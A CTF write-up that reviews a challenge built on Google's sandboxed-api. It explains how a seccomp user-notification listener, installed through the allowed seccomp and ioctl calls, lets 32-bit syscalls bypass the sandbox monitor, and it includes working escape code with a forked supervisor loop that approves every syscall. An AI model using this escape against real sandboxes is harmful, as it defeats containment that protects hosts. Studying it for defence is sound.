0xFF Prologue

attachment

I didn’t solve this challenge in the game and it’s a review based on the official wp. You can find my exploit binary here, I write it according to the official one.

0x00 Intro

It’s a challenge based on sandboxed-api@google, which is a c/c++ library. With this library, we can apply our sandbox policy to an executor (program). While running, the sandbox would monitor the syscalls of the sandboxee.

The following code is the source code of the challenge and in this challenge, our goal is to write a program and use it to read a file in the sandbox with limited syscalls.

...
int main() {
    ...
  int fd = ReadBinary();
  std::string path = absl::StrCat("/proc/", getpid(), "/fd/", fd);
  auto policy = sandbox2::PolicyBuilder()
    .AllowStaticStartup()
    .AllowFork()
    .AllowSyscalls({
      __NR_seccomp,
      __NR_ioctl,
    })
    .AllowExit()
    .AddFile(sapi::file_util::fileops::MakeAbsolute("flag", sapi::file_util::fileops::GetCWD()))
    .AddDirectory("/dev")
    .AddDirectory("/proc")
    .AllowUnrestrictedNetworking()
    .BuildOrDie();
  std::vector<std::string> args = {"sol"};
  auto executor = std::make_unique<sandbox2::Executor>(path, args);
  sandbox2::Sandbox2 sandbox(std::move(executor), std::move(policy));
  sandbox2::Result result = sandbox.Run();
  if (result.final_status() != sandbox2::Result::OK) {
    warnx("Sandbox2 failed: %s", result.ToString().c_str());
  }
}

In the main function, the program would read binary from users and run the program with the sandbox policy. As you can see, it’s quite simple. We don’t even have some basic syscalls, such as open, read, and write. However, we have some extra syscalls to help us escape from the sandbox: fork, clone, seccomp, ioctl. It’s actually a hint of the challenge.

0x01 TL;DR

The solution would be quite simple:

  1. Use seccomp(SECCOMP_SET_MODE_FILTER,SECCOMP_FILTER_FLAG_NEW_LISTENER,filter) to create a notify fd
  2. ioctl(fd) to allow all syscalls

It works because

  1. The sandbox would use its own monitor to handle several syscalls, such as x86 syscalls
  2. SECCOMP LISTENER has higher priority than SECCOMP TRACE, so we can append rules to handle these syscalls and the monitor would not be triggered.

And I’ll talk about more details in the following sections.

0x02 Forbid an Allowed Syscall VS Allow a Forbidden Syscall

This challenge’s vulnerability is

  1. Setting of sandboxed-api: Use the monitor to deal with some special cases
  2. seccomp & ioctl are allowed

Tip: The linux seccomp is secure


It’s allowed to forbid an allowed syscall but we can’t allow a forbidden syscall. The following code shows the case that we can forbid an allowed syscall and you can modify the code and verify the rest part of my statement.

#include <seccomp.h>
#include <unistd.h>
#include <syscall.h>
#include <iostream>
#include <sys/prctl.h>
#include <linux/filter.h>

using namespace std;

int main(){

    struct sock_filter strict_filter2[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_seccomp, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_open, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)
    };
    struct sock_fprog prog2 = {
        .len = sizeof(strict_filter2) / sizeof(strict_filter2[0]),
        .filter = strict_filter2,
    };
    syscall(__NR_prctl,PR_SET_NO_NEW_PRIVS,1,0,0,0);
    syscall(__NR_seccomp,SECCOMP_SET_MODE_FILTER,0,&prog2);
    syscall(__NR_write,1,"1\n",2);


    struct sock_filter strict_filter3[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog3 = {
        .len = sizeof(strict_filter3) / sizeof(strict_filter3[0]),
        .filter = strict_filter3,
    };
    
    syscall(__NR_seccomp,SECCOMP_SET_MODE_FILTER,0,&prog3);
    syscall(__NR_write,1,"2\n",2);
}

0x03 SECCOMP_RET_?

To keep everything simple, We didn’t talk about this interesting part in Guide-of-Seccomp-in-CTF. And it’s a good opportunity to introduce it here.

SECCOMP_RET_XxX is the return value of the filter. As we know, the third parameter of seccomp(SECCOMP_SET_MODE_FILTER,) is a bpf filter(sock_fprog).

struct sock_filter {	/* Filter block */
	__u16	code;   /* Actual filter code */
	__u8	jt;	/* Jump true */
	__u8	jf;	/* Jump false */
	__u32	k;      /* Generic multiuse field */
};
struct sock_fprog {	/* Required for SO_ATTACH_FILTER. */
	unsigned short		len;	/* Number of filter blocks */
	struct sock_filter *filter;
};

And there are len*struct sock_filter in sock_filter. The filter is a bpf and it has kinds of return values. If you take a closer look at the filter, you would find the return value’s names are started with “SECCOMP_RET”.

There are 8 different return values:

SECCOMP_RET_KILL_PROCESS
SECCOMP_RET_KILL_THREAD 
SECCOMP_RET_TRAP
SECCOMP_RET_ERRNO
SECCOMP_RET_USER_NOTIF 
SECCOMP_RET_TRACE
SECCOMP_RET_LOG 
SECCOMP_RET_ALLOW

We know SECCOMP_RET_ALLOW and SECCOMP_RET_KILL_PROCESS clearly, as they are very common in CTF challenges. And SECCOMP_RET_USER_NOTIF, SECCOMP_RET_TRACE are important for solving/understanding this challenge.

SECCOMP_RET_TRACE: When returned, this value will cause the kernel to attempt to notify a ptrace(2)-based tracer prior to executing the system call.

In sandboxed-api, you can find lots of SECCOMP_RET_TRACE cases and these cases would be handled by a monitor. We’ll have a closer look at this later.

SECCOMP_RET_USER_NOTIF: Forward the system call to an attached user-spacesupervisor process to allow that process to decide what todo with the system call.

SECCOMP_RET_USER_NOTIF is used to delegate a seccomp supervisor in user space and it’s important to know that SECCOMP_RET_USER_NOTIF takes precedence of SECCOMP_RET_TRACE. And that’s the key to solving this challenge cuz we could use __NR_seccomp and __NR_ioctl to create a seccomp supervisor and avoid the syscall’s being traced by the monitor.

0x04 Why does it work?

The vulnerability is that the sandbox would implement the monitor to trace the different arch syscalls, such as the x86 syscall. The sandboxed-api would stop the process if the monitor detects that. However, we can use USER_NOTIF to complete the syscall without notifying monitor.



  int result =
      syscall(__NR_seccomp, SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_TSYNC,
              reinterpret_cast<uintptr_t>(&prog));

Let’s start with the structure of sandboxed-api. There is a server and it would fork to create the client, which spawns the sandboxee. In addition, the client (client.cc) of forkserver would use ReceivePolicy, EnableSandbox, and ApplyPolicyAndBecomeTracee to apply the seccomp policy.

So it’s important to know policy generation. If it’s secure we have to find a 0day of Linux seccomp:) I read related files such as policy.cc and policybuilder.cc.

// The final policy is the concatenation of:
//   1. default policy (GetDefaultPolicy, private),
//   2. user policy (user_policy_, public),
//   3. default KILL action (avoid failing open if user policy did not do it).
std::vector<sock_filter> Policy::GetPolicy() const {
  if (absl::GetFlag(FLAGS_sandbox2_danger_danger_permit_all) ||
      !absl::GetFlag(FLAGS_sandbox2_danger_danger_permit_all_and_log).empty()) {
    return GetTrackingPolicy();
  }

  // Now we can start building the policy.
  // 1. Start with the default policy (e.g. syscall architecture checks).
  auto policy = GetDefaultPolicy();
  VLOG(3) << "Default policy:\n" << bpf::Disasm(policy);

  // 2. Append user policy.
  VLOG(3) << "User policy:\n" << bpf::Disasm(user_policy_);
  // Add default syscall_nr loading in case the user forgets.
  policy.push_back(LOAD_SYSCALL_NR);
  policy.insert(policy.end(), user_policy_.begin(), user_policy_.end());

  // 3. Finish with default KILL action.
  policy.push_back(KILL);

  VLOG(2) << "Final policy:\n" << bpf::Disasm(policy);
  return policy;
}

According to the comment of above code in policy.cc, final policy == default policy + user policy+ default Kill action.

std::vector<sock_filter> Policy::GetDefaultPolicy() const {
  bpf_labels l = {0};
  std::vector<sock_filter> policy = {
    // If compiled arch is different from the runtime one, inform the Monitor.
    LOAD_ARCH,
    JEQ32(Syscall::GetHostAuditArch(), JUMP(&l, past_arch_check_l)),
#if defined(SAPI_X86_64)
    JEQ32(AUDIT_ARCH_I386, TRACE(sapi::cpu::kX86)),  // 32-bit sandboxee
#endif
    TRACE(sapi::cpu::kUnknown),
    LABEL(&l, past_arch_check_l),

    ...

After going through the default policy and user policy in chal.cc, I find there is no rules forbidding x86 syscall and these syscalls would be sent to monitor.

Tip: the following part of this section is meaningless to solve this challenge because now we already know that it’s feasible to use a user space listener to allow these syscalls. Btw, the following paragraphs of this section could help you know the whole story.


In monitor.cc, we can find the handler by the log info:

E20220705 15:33:41.983273 16780 monitor.cc:862] SANDBOX VIOLATION : PID: 16785, PROG: 'main' : [X86-32] open [5](0x4c00f0 ['./flag'], 0, 0 [\00], 0x60473b88, 0x1, 0x60473a50) IP: 0x401c5e, STACK: 0x60473a48
E20220705 15:33:41.983367 16780 monitor.cc:1153] This is a violation because the syscall was issued because the sandboxee and executor architectures are different.

According to the file name and line number provided, I found the related source code in the certain repo. (5e61ce08533af4b066970a7452254ecfc0f48d50)

void Monitor::LogSyscallViolation(const Syscall& syscall) const {
  // Do not unwind libunwind.
  if (executor_->libunwind_sbox_for_pid_ != 0) {
    LOG(ERROR) << "Sandbox violation during execution of libunwind: "
               << syscall.GetDescription();
    return;
  }

  // So, this is an invalid syscall. Will be killed by seccomp-bpf policies as
  // well, but we should be on a safe side here as well.
  LOG(ERROR) << "SANDBOX VIOLATION : PID: " << syscall.pid() << ", PROG: '"
             << util::GetProgName(syscall.pid())
             << "' : " << syscall.GetDescription();
  if (VLOG_IS_ON(1)) {
    VLOG(1) << "Cmdline: " << util::GetCmdLine(syscall.pid());
    VLOG(1) << "Task Name: " << util::GetProcStatusLine(syscall.pid(), "Name");
    VLOG(1) << "Tgid: " << util::GetProcStatusLine(syscall.pid(), "Tgid");
  }

  LogSyscallViolationExplanation(syscall);
}

void Monitor::ActionProcessSyscallViolation(Regs* regs, const Syscall& syscall,
                                            ViolationType violation_type) {
  LogSyscallViolation(syscall);
  notify_->EventSyscallViolation(syscall, violation_type);
  SetExitStatusCode(Result::VIOLATION, syscall.nr());
  result_.SetSyscall(absl::make_unique<Syscall>(syscall));
  SetAdditionalResultInfo(absl::make_unique<Regs>(*regs));
  // Rewrite the syscall argument to something invalid (-1).
  // The process will be killed anyway so this is just a precaution.
  auto status = regs->SkipSyscallReturnValue(-ENOSYS);
  if (!status.ok()) {
    LOG(ERROR) << status;
  }
}

It’s actually a violation-log function and there is only one reference of it and it’s another log function ActionProcessSyscallViolation, which is also shown above.

ActionProcessSyscallViolation has three references in the source code and it’s easy to locate the one triggered by our x86 syscalls with strace -f ( it’s easier because there are only 3, I used strace to verify it).

  Syscall syscall = regs.ToSyscall(syscall_arch);
  // If the architecture of the syscall used is different that the current host
  // architecture, report a violation.
  if (syscall_arch != Syscall::GetHostArch()) {
    ActionProcessSyscallViolation(&regs, syscall, kArchitectureSwitchViolation);
    return;
  }

0x05 Nature of the challenge

This challenge is actually equal to the following program. You can find the code here.

#include <seccomp.h>
#include <unistd.h>
#include <syscall.h>
#include <iostream>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <string.h>
#include <sys/ioctl.h>


extern "C" {
extern void show_flag();
}
using namespace std;

int main(){

    // challenge setting
    struct sock_filter strict_filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS,offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_seccomp, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_fork, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
		BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRACE),
    };
    struct sock_fprog prog = {
        .len = sizeof(strict_filter) / sizeof(strict_filter[0]),
        .filter = strict_filter,
    };
    syscall(__NR_prctl,PR_SET_NO_NEW_PRIVS,1,0,0,0);
    syscall(__NR_seccomp,SECCOMP_SET_MODE_FILTER,0,&prog);

    // --- exp --- 
	struct sock_filter exp_filter[] = {
		BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, arch)),
		BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
		BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_USER_NOTIF),
		BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW),
	};

    struct sock_fprog exp_prog = {
        .len = sizeof(exp_filter) / sizeof(exp_filter[0]),
        .filter = exp_filter,
    };
	// Use seccom to create a listener
	
	int fd = syscall(317,SECCOMP_SET_MODE_FILTER,SECCOMP_FILTER_FLAG_NEW_LISTENER ,&exp_prog);
	
    if(fd==3)
	{
		int pid = syscall(__NR_fork);
		if(pid)
		{

		    struct seccomp_notif req={};
           	struct seccomp_notif_resp resp={};
			
			
			while(1){

				memset(&req,0,sizeof(struct seccomp_notif));
				memset(&resp,0,sizeof(struct seccomp_notif_resp));
				syscall(__NR_ioctl,fd, SECCOMP_IOCTL_NOTIF_RECV, &req);
				resp.id = req.id;
				resp.flags = SECCOMP_USER_NOTIF_FLAG_CONTINUE; // allow all the syscalls
				syscall(__NR_ioctl,fd, SECCOMP_IOCTL_NOTIF_SEND, &resp);
			}

		}
		else if(pid==0){
			for(int i; i<0x100000;i++)
				;//waite for parent's work to be finished
			show_flag();
			
		}
		else{
			_Exit(-123);
		}

	}
	else
		_Exit(-1);

    
}

In the program, the first seccomp syscall imitates the challenge’s env. It would pass the x86 syscall to monitor while the second seccomp syscall is performing the exploit.

0x06 Epilogue

What I learned:

all: main

main: main.cc asmcode.S
        gcc -no-pie -c ./asmcode.S -o ./asmcode.o
        g++ -no-pie -c ./main.cc -o ./main.o
        g++ --static -no-pie ./main.o ./asmcode.o -o ./main

0x07 Reference